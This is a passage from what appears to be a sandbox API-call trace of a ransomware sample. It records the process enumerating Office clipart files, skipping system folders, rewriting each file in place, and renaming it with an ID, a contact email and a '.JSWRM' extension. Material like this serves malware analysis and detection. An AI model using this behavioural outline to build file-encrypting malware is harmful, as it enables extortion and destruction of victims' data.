dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01905_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01905_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01905_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0097.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0097.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0097.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01905_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.255] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1400) returned 1 [0097.255] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x570) returned 0x2332c0 [0097.255] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x570, lpOverlapped=0x0) returned 1 [0097.256] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.256] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x570, lpOverlapped=0x0) returned 1 [0097.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0097.257] CloseHandle (hObject=0x314) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0097.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0097.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0097.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0097.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0097.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.257] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01905_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01905_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01905_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0097.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0097.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0097.258] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3086, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01954_.WMF", cAlternateFileName="")) returned 1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2=".") returned 1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="..") returned 1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="...") returned 1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="windows") returned -1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="recovery") returned 1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="perflogs") returned 1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="documents and settings") returned 1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="system volume information") returned -1 [0097.258] lstrcmpiW (lpString1="SO01954_.WMF", lpString2="msocache") returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0097.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01954_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01954_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01954_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01954_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01954_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01954_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0097.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0097.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01954_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.259] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12422) returned 1 [0097.259] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3080) returned 0x24d210 [0097.260] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3080, lpOverlapped=0x0) returned 1 [0097.263] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.263] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3080, lpOverlapped=0x0) returned 1 [0097.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.263] CloseHandle (hObject=0x314) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0097.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0097.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0097.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0097.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0097.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.263] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01954_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01954_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01954_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0097.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0097.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0097.264] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d14, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02009_.WMF", cAlternateFileName="")) returned 1 [0097.264] lstrcmpiW (lpString1="SO02009_.WMF", lpString2=".") returned 1 [0097.264] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="..") returned 1 [0097.264] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="...") returned 1 [0097.264] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="windows") returned -1 [0097.264] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="recovery") returned 1 [0097.265] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="perflogs") returned 1 [0097.265] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="documents and settings") returned 1 [0097.265] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.265] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="system volume information") returned -1 [0097.265] lstrcmpiW (lpString1="SO02009_.WMF", lpString2="msocache") returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0097.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02009_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02009_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02009_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0097.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02009_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02009_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02009_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0097.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02009_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.266] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7444) returned 1 [0097.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d10) returned 0x205850 [0097.266] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d10, lpOverlapped=0x0) returned 1 [0097.268] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.268] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d10, lpOverlapped=0x0) returned 1 [0097.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.269] CloseHandle (hObject=0x314) returned 1 [0097.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0097.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0097.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0097.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0097.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0097.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0097.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0097.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0097.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.270] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02009_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02009_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02009_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0097.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0097.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0097.271] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d68, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02022_.WMF", cAlternateFileName="")) returned 1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2=".") returned 1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="..") returned 1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="...") returned 1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="windows") returned -1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="recovery") returned 1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="perflogs") returned 1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="documents and settings") returned 1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="system volume information") returned -1 [0097.271] lstrcmpiW (lpString1="SO02022_.WMF", lpString2="msocache") returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0097.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02022_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02022_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02022_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0097.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02022_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02022_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02022_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0097.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0097.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02022_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.272] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: 